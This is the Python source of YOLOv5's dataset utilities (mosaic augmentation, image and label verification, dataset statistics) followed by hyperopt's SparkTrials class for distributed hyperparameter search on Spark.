labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0.0, 0, 0, 1, 0, 0]])
wo = torch.tensor([[0.0, 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, 0.5, 0.5, 0.5, 0.5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2.0, mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, i):
# loads 1 image from dataset index 'i', returns im, original hw, resized hw
im = self.imgs[i]
if im is None: # not cached in ram
npy = self.img_npy[i]
if npy and npy.exists(): # load npy
im = np.load(npy)
else: # read image
path = self.img_files[i]
im = cv2.imread(path) # BGR
assert im is not None, f'Image Not Found {path}'
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
im = cv2.resize(im, (int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
else:
return self.imgs[i], self.img_hw0[i], self.img_hw[i] # im, hw_original, hw_resized
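# --- Illustrative note (not part of the original file): the resize rule used in load_image().
# With self.img_size == 640 and an original 1280x960 image (h0=960, w0=1280),
# r = 640 / 1280 = 0.5, so the image is resized to 640x480 and the function returns
# (im, (960, 1280), (480, 640)).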
def load_mosaic(self, index):
# YOLOv5 4-mosaic loader. Loads 1 image + 3 random images into a 4-image mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = (int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border) # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# YOLOv5 9-mosaic loader. Loads 1 image + 8 random images into a 9-image mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
            img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8)  # base image with 9 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = (max(x, 0) for x in c) # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = (int(random.uniform(0, s)) for _ in self.mosaic_border) # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../datasets/coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../datasets/coco128'): # from utils.datasets import *; extract_boxes()
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
        if im_file.suffix[1:].lower() in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file) as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
                    b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)  # np.int is deprecated
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../datasets/coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sorted(x for x in path.rglob('*.*') if x.suffix[1:].lower() in IMG_FORMATS) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path.parent / x).unlink(missing_ok=True) for x in txt] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write('./' + img.relative_to(path.parent).as_posix() + '\n') # add image to txt file
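# --- Illustrative sketch (not part of the original file): a hypothetical 80/10/10 split of a
# custom dataset, keeping only images that already have a label file:
#   autosplit(path='../datasets/custom/images', weights=(0.8, 0.1, 0.1), annotated_only=True)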
def verify_image_label(args):
# Verify one image-label pair
im_file, lb_file, prefix = args
nm, nf, ne, nc, msg, segments = 0, 0, 0, 0, '', [] # number (missing, found, empty, corrupt), message, segments
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'
if im.format.lower() in ('jpg', 'jpeg'):
with open(im_file, 'rb') as f:
f.seek(-2, 2)
if f.read() != b'\xff\xd9': # corrupt JPEG
ImageOps.exif_transpose(Image.open(im_file)).save(im_file, 'JPEG', subsampling=0, quality=100)
msg = f'{prefix}WARNING: {im_file}: corrupt JPEG restored and saved'
# verify labels
if os.path.isfile(lb_file):
nf = 1 # label found
with open(lb_file) as f:
l = [x.split() for x in f.read().strip().splitlines() if len(x)]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
nl = len(l)
if nl:
assert l.shape[1] == 5, f'labels require 5 columns, {l.shape[1]} columns detected'
assert (l >= 0).all(), f'negative label values {l[l < 0]}'
assert (l[:, 1:] <= 1).all(), f'non-normalized or out of bounds coordinates {l[:, 1:][l[:, 1:] > 1]}'
_, i = np.unique(l, axis=0, return_index=True)
if len(i) < nl: # duplicate row check
l = l[i] # remove duplicates
if segments:
segments = segments[i]
msg = f'{prefix}WARNING: {im_file}: {nl - len(i)} duplicate labels removed'
else:
ne = 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm = 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
return im_file, l, shape, segments, nm, nf, ne, nc, msg
except Exception as e:
nc = 1
msg = f'{prefix}WARNING: {im_file}: ignoring corrupt image/label: {e}'
return [None, None, None, None, nm, nf, ne, nc, msg]
def dataset_stats(path='coco128.yaml', autodownload=False, verbose=False, profile=False, hub=False):
""" Return dataset statistics dictionary with images and instances counts per split per class
To run in parent directory: export PYTHONPATH="$PWD/yolov5"
Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
Usage2: from utils.datasets import *; dataset_stats('../datasets/coco128_with_yaml.zip')
Arguments
path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
autodownload: Attempt to download dataset if not found locally
        verbose: Print stats dictionary
        profile: Time reads/writes of the generated stats file (debugging aid)
        hub: Also save resized images and stats.json for web/app viewing
"""
def round_labels(labels):
# Update labels to integer class and 6 decimal place floats
return [[int(c), *(round(x, 4) for x in points)] for c, *points in labels]
def unzip(path):
# Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
if str(path).endswith('.zip'): # path is data.zip
assert Path(path).is_file(), f'Error unzipping {path}, file not found'
ZipFile(path).extractall(path=path.parent) # unzip
dir = path.with_suffix('') # dataset directory == zip name
return True, str(dir), next(dir.rglob('*.yaml')) # zipped, data_dir, yaml_path
else: # path is data.yaml
return False, None, path
def hub_ops(f, max_dim=1920):
# HUB ops for 1 image 'f': resize and save at reduced quality in /dataset-hub for web/app viewing
f_new = im_dir / Path(f).name # dataset-hub image filename
try: # use PIL
im = Image.open(f)
r = max_dim / max(im.height, im.width) # ratio
if r < 1.0: # image too large
im = im.resize((int(im.width * r), int(im.height * r)))
im.save(f_new, 'JPEG', quality=75, optimize=True) # save
except Exception as e: # use OpenCV
print(f'WARNING: HUB ops PIL failure {f}: {e}')
im = cv2.imread(f)
im_height, im_width = im.shape[:2]
r = max_dim / max(im_height, im_width) # ratio
if r < 1.0: # image too large
im = cv2.resize(im, (int(im_width * r), int(im_height * r)), interpolation=cv2.INTER_LINEAR)
cv2.imwrite(str(f_new), im)
zipped, data_dir, yaml_path = unzip(Path(path))
with open(check_yaml(yaml_path), errors='ignore') as f:
data = yaml.safe_load(f) # data dict
if zipped:
data['path'] = data_dir # TODO: should this be dir.resolve()?
check_dataset(data, autodownload) # download dataset if missing
hub_dir = Path(data['path'] + ('-hub' if hub else ''))
stats = {'nc': data['nc'], 'names': data['names']} # statistics dictionary
for split in 'train', 'val', 'test':
if data.get(split) is None:
stats[split] = None # i.e. no test set
continue
x = []
dataset = LoadImagesAndLabels(data[split]) # load dataset
for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics'):
x.append(np.bincount(label[:, 0].astype(int), minlength=data['nc']))
x = np.array(x) # shape(128x80)
stats[split] = {'instance_stats': {'total': int(x.sum()), 'per_class': x.sum(0).tolist()},
'image_stats': {'total': dataset.n, 'unlabelled': int(np.all(x == 0, 1).sum()),
'per_class': (x > 0).sum(0).tolist()},
'labels': [{str(Path(k).name): round_labels(v.tolist())} for k, v in
zip(dataset.img_files, dataset.labels)]}
if hub:
im_dir = hub_dir / 'images'
im_dir.mkdir(parents=True, exist_ok=True)
for _ in tqdm(ThreadPool(NUM_THREADS).imap(hub_ops, dataset.img_files), total=dataset.n, desc='HUB Ops'):
pass
# Profile
stats_path = hub_dir / 'stats.json'
if profile:
for _ in range(1):
file = stats_path.with_suffix('.npy')
t1 = time.time()
np.save(file, stats)
t2 = time.time()
x = np.load(file, allow_pickle=True)
print(f'stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
file = stats_path.with_suffix('.json')
t1 = time.time()
with open(file, 'w') as f:
json.dump(stats, f) # save stats *.json
t2 = time.time()
with open(file) as f:
x = json.load(f) # load hyps dict
print(f'stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
# Save, print and return
if hub:
print(f'Saving {stats_path.resolve()}...')
with open(stats_path, 'w') as f:
json.dump(stats, f) # save stats.json
if verbose:
print(json.dumps(stats, indent=2, sort_keys=False))
return stats
|
spark.py
|
import copy
import threading
import time
import timeit
import traceback
from hyperopt import base, fmin, Trials
from hyperopt.base import validate_timeout, validate_loss_threshold
from hyperopt.utils import coarse_utcnow, _get_logger, _get_random_id
try:
from pyspark.sql import SparkSession
from pyspark.util import VersionUtils
import pyspark
_have_spark = True
_spark_major_minor_version = VersionUtils.majorMinorVersion(pyspark.__version__)
except ImportError as e:
_have_spark = False
_spark_major_minor_version = None
logger = _get_logger("hyperopt-spark")
class SparkTrials(Trials):
"""
Implementation of hyperopt.Trials supporting
distributed execution using Apache Spark clusters.
This requires fmin to be run on a Spark cluster.
Plugging SparkTrials into hyperopt.fmin() allows hyperopt
to send model training and evaluation tasks to Spark workers,
parallelizing hyperparameter search.
Each trial (set of hyperparameter values) is handled within
a single Spark task; i.e., each model will be fit and evaluated
on a single worker machine. Trials are run asynchronously.
See hyperopt.Trials docs for general information about Trials.
The fields we store in our trial docs match the base Trials class. The fields include:
- 'tid': trial ID
- 'state': JOB_STATE_DONE, JOB_STATE_ERROR, etc.
- 'result': evaluation result for completed trial run
- 'refresh_time': timestamp for last status update
- 'misc': includes:
- 'error': (error type, error message)
- 'book_time': timestamp for trial run start
"""
asynchronous = True
# Hard cap on the number of concurrent hyperopt tasks (Spark jobs) to run. Set at 128.
MAX_CONCURRENT_JOBS_ALLOWED = 128
def __init__(
self, parallelism=None, timeout=None, loss_threshold=None, spark_session=None
):
"""
:param parallelism: Maximum number of parallel trials to run,
i.e., maximum number of concurrent Spark tasks.
The actual parallelism is subject to available Spark task slots at
runtime.
If set to None (default) or a non-positive value, this will be set to
Spark's default parallelism or `1`.
We cap the value at `MAX_CONCURRENT_JOBS_ALLOWED=128`.
:param timeout: Maximum time (in seconds) which fmin is allowed to take.
If this timeout is hit, then fmin will cancel running and proposed trials.
It will retain all completed trial runs and return the best result found
so far.
:param spark_session: A SparkSession object. If None is passed, SparkTrials will attempt
to use an existing SparkSession or create a new one. SparkSession is
the entry point for various facilities provided by Spark. For more
information, visit the documentation for PySpark.
"""
super().__init__(exp_key=None, refresh=False)
if not _have_spark:
raise Exception(
"SparkTrials cannot import pyspark classes. Make sure that PySpark "
"is available in your environment. E.g., try running 'import pyspark'"
)
validate_timeout(timeout)
validate_loss_threshold(loss_threshold)
self._spark = (
SparkSession.builder.getOrCreate()
if spark_session is None
else spark_session
)
self._spark_context = self._spark.sparkContext
# The feature to support controlling jobGroupIds is in SPARK-22340
self._spark_supports_job_cancelling = (
_spark_major_minor_version
>= (
3,
2,
)
or hasattr(self._spark_context.parallelize([1]), "collectWithJobGroup")
)
spark_default_parallelism = self._spark_context.defaultParallelism
self.parallelism = self._decide_parallelism(
requested_parallelism=parallelism,
spark_default_parallelism=spark_default_parallelism,
)
if not self._spark_supports_job_cancelling and timeout is not None:
logger.warning(
"SparkTrials was constructed with a timeout specified, but this Apache "
"Spark version does not support job group-based cancellation. The "
"timeout will be respected when starting new Spark jobs, but "
"SparkTrials will not be able to cancel running Spark jobs which exceed"
" the timeout."
)
self.timeout = timeout
self.loss_threshold = loss_threshold
self._fmin_cancelled = False
self._fmin_cancelled_reason = None
self.refresh()
@staticmethod
def _decide_parallelism(requested_parallelism, spark_default_parallelism):
"""
Given the requested parallelism, return the max parallelism SparkTrials will actually use.
See the docstring for `parallelism` in the constructor for expected behavior.
"""
if requested_parallelism is None or requested_parallelism <= 0:
parallelism = max(spark_default_parallelism, 1)
logger.warning(
"Because the requested parallelism was None or a non-positive value, "
"parallelism will be set to ({d}), which is Spark's default parallelism ({s}), "
"or 1, whichever is greater. "
"We recommend setting parallelism explicitly to a positive value because "
"the total of Spark task slots is subject to cluster sizing.".format(
d=parallelism, s=spark_default_parallelism
)
)
else:
parallelism = requested_parallelism
if parallelism > SparkTrials.MAX_CONCURRENT_JOBS_ALLOWED:
logger.warning(
"Parallelism ({p}) is capped at SparkTrials.MAX_CONCURRENT_JOBS_ALLOWED ({c}).".format(
p=parallelism, c=SparkTrials.MAX_CONCURRENT_JOBS_ALLOWED
)
)
parallelism = SparkTrials.MAX_CONCURRENT_JOBS_ALLOWED
return parallelism
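    # --- Illustrative note (not part of the original file): the rule implemented above.
    #   _decide_parallelism(None, 8)  -> 8    (fall back to Spark's default parallelism)
    #   _decide_parallelism(-1, 0)    -> 1    (non-positive request and no default -> 1)
    #   _decide_parallelism(500, 8)   -> 128  (capped at MAX_CONCURRENT_JOBS_ALLOWED)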
def count_successful_trials(self):
"""
Returns the current number of trials which ran successfully
"""
return self.count_by_state_unsynced(base.JOB_STATE_DONE)
def count_failed_trials(self):
"""
Returns the current number of trial runs which failed
"""
return self.count_by_state_unsynced(base.JOB_STATE_ERROR)
def count_cancelled_trials(self):
"""
Returns the current number of cancelled trial runs.
This covers trials which are cancelled from exceeding the timeout.
"""
return self.count_by_state_unsynced(base.JOB_STATE_CANCEL)
def count_total_trials(self):
"""
Returns the current number of all successful, failed, and cancelled trial runs
"""
total_states = [
base.JOB_STATE_DONE,
base.JOB_STATE_ERROR,
base.JOB_STATE_CANCEL,
]
return self.count_by_state_unsynced(total_states)
def delete_all(self):
"""
Reset the Trials to init state
"""
super().delete_all()
self._fmin_cancelled = False
self._fmin_cancelled_reason = None
def trial_attachments(self, trial):
raise NotImplementedError("SparkTrials does not support trial attachments.")
def fmin(
self,
fn,
space,
algo,
max_evals,
timeout,
loss_threshold,
max_queue_len,
rstate,
verbose,
pass_expr_memo_ctrl,
catch_eval_exceptions,
return_argmin,
show_progressbar,
early_stop_fn,
trials_save_file="",
):
"""
This should not be called directly but is called via :func:`hyperopt.fmin`
Refer to :func:`hyperopt.fmin` for docs on each argument
"""
if timeout is not None:
if self.timeout is not None:
logger.warning(
"Timeout param was defined in Trials object, ignoring fmin definition"
)
else:
validate_timeout(timeout)
self.timeout = timeout
if loss_threshold is not None:
validate_loss_threshold(loss_threshold)
self.loss_threshold = loss_threshold
assert (
not pass_expr_memo_ctrl
), "SparkTrials does not support `pass_expr_memo_ctrl`"
assert (
not catch_eval_exceptions
), "SparkTrials does not support `catch_eval_exceptions`"
state = _SparkFMinState(self._spark, fn, space, self)
# Will launch a dispatcher thread which runs each trial task as one spark job.
state.launch_dispatcher()
try:
res = fmin(
fn,
space,
algo,
max_evals,
timeout=timeout,
loss_threshold=loss_threshold,
max_queue_len=max_queue_len,
trials=self,
allow_trials_fmin=False, # -- prevent recursion
rstate=rstate,
pass_expr_memo_ctrl=None, # not supported
catch_eval_exceptions=catch_eval_exceptions,
verbose=verbose,
return_argmin=return_argmin,
points_to_evaluate=None, # not supported
show_progressbar=show_progressbar,
early_stop_fn=early_stop_fn,
trials_save_file="", # not supported
)
except BaseException as e:
logger.debug("fmin thread exits with an exception raised.")
raise e
else:
logger.debug("fmin thread exits normally.")
return res
finally:
state.wait_for_all_threads()
logger.info(
"Total Trials: {t}: {s} succeeded, {f} failed, {c} cancelled.".format(
t=self.count_total_trials(),
s=self.count_successful_trials(),
f=self.count_failed_trials(),
c=self.count_cancelled_trials(),
)
)
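# --- Illustrative sketch (not part of the original file): a minimal fmin() run that uses
# SparkTrials. The objective and search space are made up for illustration only.
def _spark_trials_example():
    from hyperopt import fmin, tpe, hp
    trials = SparkTrials(parallelism=4, timeout=600)
    best = fmin(
        fn=lambda x: (x - 3) ** 2,   # loss evaluated inside a Spark task
        space=hp.uniform('x', -10, 10),
        algo=tpe.suggest,
        max_evals=50,
        trials=trials,
    )
    return best                      # best hyperparameter values found, e.g. {'x': ...}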
class _SparkFMinState:
"""
Class for managing threads which run concurrent Spark jobs.
This maintains a primary dispatcher thread, plus 1 thread per Hyperopt trial.
Each trial's thread runs 1 Spark job with 1 task.
"""
def __init__(self, spark, eval_function, space, trials):
self.spark = spark
self.eval_function = eval_function
self.space = space
self.trials = trials
self._fmin_done = False
self._dispatcher_thread = None
self._task_threads = set()
if self.trials._spark_supports_job_cancelling:
spark_context = spark.sparkContext
self._job_group_id = spark_context.getLocalProperty("spark.jobGroup.id")
self._job_desc = spark_context.getLocalProperty("spark.job.description")
interrupt_on_cancel = spark_context.getLocalProperty(
"spark.job.interruptOnCancel"
)
if interrupt_on_cancel is None:
self._job_interrupt_on_cancel = False
else:
self._job_interrupt_on_cancel = "true" == interrupt_on_cancel.lower()
# In certain Spark deployments, the local property "spark.jobGroup.id"
# value is None, so we create one to use for SparkTrials.
if self._job_group_id is None:
self._job_group_id = "Hyperopt_SparkTrials_" + _get_random_id()
if self._job_desc is None:
self._job_desc = "Trial evaluation jobs launched by hyperopt fmin"
logger.debug(
"Job group id: {g}, job desc: {d}, job interrupt on cancel: {i}".format(
g=self._job_group_id,
d=self._job_desc,
i=self._job_interrupt_on_cancel,
)
)
def running_trial_count(self):
return self.trials.count_by_state_unsynced(base.JOB_STATE_RUNNING)
@staticmethod
def _begin_trial_run(trial):
trial["state"] = base.JOB_STATE_RUNNING
now = coarse_utcnow()
trial["book_time"] = now
trial["refresh_time"] = now
logger.debug("trial task {tid} started".format(tid=trial["tid"]))
@staticmethod
def _get_traceback(err):
return err.__dict__.get("_tb_str")
def _finish_trial_run(self, is_success, is_cancelled, trial, data):
"""
Call this method when a trial evaluation finishes. It will save results to the
trial object and update task counters.
:param is_success: whether the trial succeeded
:param is_cancelled: whether the trial was cancelled
:param data: If the trial succeeded, this is the return value from the trial
task function. Otherwise, this is the exception raised when running the trial
task.
"""
if is_cancelled:
logger.debug(
"trial task {tid} cancelled, exception is {e}".format(
tid=trial["tid"], e=str(data)
)
)
self._write_cancellation_back(trial, e=data)
elif is_success:
logger.debug(
"trial task {tid} succeeded, result is {r}".format(
tid=trial["tid"], r=data
)
)
self._write_result_back(trial, result=data)
else:
logger.error(
"trial task {tid} failed, exception is {e}.\n {tb}".format(
tid=trial["tid"], e=str(data), tb=self._get_traceback(data)
)
)
self._write_exception_back(trial, e=data)
def launch_dispatcher(self):
def run_dispatcher():
start_time = timeit.default_timer()
while not self._fmin_done:
new_tasks = self._poll_new_tasks()
for trial in new_tasks:
self._run_trial_async(trial)
cur_time = timeit.default_timer()
elapsed_time = cur_time - start_time
# In the future, timeout checking logic could be moved to `fmin`.
# For now, timeouts are specific to SparkTrials.
# When a timeout happens:
# - Set `trials._fmin_cancelled` flag to be True.
# - FMinIter checks this flag and exits if it is set to True.
if (
self.trials.timeout is not None
and elapsed_time > self.trials.timeout
and not self.trials._fmin_cancelled
):
self.trials._fmin_cancelled = True
self.trials._fmin_cancelled_reason = "fmin run timeout"
self._cancel_running_trials()
logger.warning(
"fmin cancelled because of "
+ self.trials._fmin_cancelled_reason
)
time.sleep(1)
if self.trials._fmin_cancelled:
                # Because fmin cancellation has been triggered, warn that the dispatcher
                # will not launch any more trial tasks.
logger.warning("fmin is cancelled, so new trials will not be launched.")
logger.debug("dispatcher thread exits normally.")
self._dispatcher_thread = threading.Thread(target=run_dispatcher)
        self._dispatcher_thread.daemon = True  # setDaemon() is deprecated
self._dispatcher_thread.start()
@staticmethod
def _get_spec_from_trial(trial):
return base.spec_from_misc(trial["misc"])
@staticmethod
def _write_result_back(trial, result):
trial["state"] = base.JOB_STATE_DONE
trial["result"] = result
trial["refresh_time"] = coarse_utcnow()
def _write_exception_back(self, trial, e):
trial["state"] = base.JOB_STATE_ERROR
trial["misc"]["error"] = (str(type(e)), self._get_traceback(e))
trial["refresh_time"] = coarse_utcnow()
@staticmethod
def _write_cancellation_back(trial, e):
trial["state"] = base.JOB_STATE_CANCEL
trial["misc"]["error"] = (str(type(e)), str(e))
trial["refresh_time"] = coarse_utcnow()
def _run_trial_async(self, trial):
def finish_trial_run(result_or_e):
if not isinstance(result_or_e, BaseException):
self._finish_trial_run(
is_success=True,
is_cancelled=self.trials._fmin_cancelled,
trial=trial,
data=result_or_e,
)
logger.debug(
"trial {tid} task thread exits normally and writes results "
"back correctly.".format(tid=trial["tid"])
)
else:
self._finish_trial_run(
is_success=False,
is_cancelled=self.trials._fmin_cancelled,
trial=trial,
data=result_or_e,
)
logger.debug(
"trial {tid} task thread catches an exception and writes the "
"info back correctly.".format(tid=trial["tid"])
)
def run_task_thread():
local_eval_function, local_space = self.eval_function, self.space
params = self._get_spec_from_trial(trial)
def run_task_on_executor(_):
domain = base.Domain(
local_eval_function, local_space, pass_expr_memo_ctrl=None
)
try:
result = domain.evaluate(
params, ctrl=None, attach_attachments=False
)
yield result
except BaseException as e:
                    # Because the traceback is not picklable, we need to format it
                    # and pass it back to the driver.
_traceback_string = traceback.format_exc()
logger.error(_traceback_string)
e._tb_str = _traceback_string
yield e
try:
worker_rdd = self.spark.sparkContext.parallelize([0], 1)
if self.trials._spark_supports_job_cancelling:
if _spark_major_minor_version >= (3, 2):
spark_context = self.spark.sparkContext
spark_context.setLocalProperty(
"spark.jobGroup.id", self._job_group_id
)
spark_context.setLocalProperty(
"spark.job.description", self._job_desc
)
spark_context.setLocalProperty(
"spark.job.interruptOnCancel",
str(self._job_interrupt_on_cancel).lower(),
)
result_or_e = worker_rdd.mapPartitions(
run_task_on_executor
).collect()[0]
else:
result_or_e = worker_rdd.mapPartitions(
run_task_on_executor
).collectWithJobGroup(
self._job_group_id,
self._job_desc,
self._job_interrupt_on_cancel,
)[
0
]
else:
result_or_e = worker_rdd.mapPartitions(
run_task_on_executor
).collect()[0]
except BaseException as e:
                # Catch all exceptions here to keep the program robust. Several
                # different failure modes can raise an exception at this point,
                # hence `except BaseException`.
                #
                # If the cancelled flag is set, it means we need to cancel all
                # running tasks; otherwise it means the task failed.
finish_trial_run(e)
else:
                # Exceptions captured in run_task_on_executor are returned in result_or_e.
finish_trial_run(result_or_e)
if _spark_major_minor_version >= (3, 2):
from pyspark import inheritable_thread_target
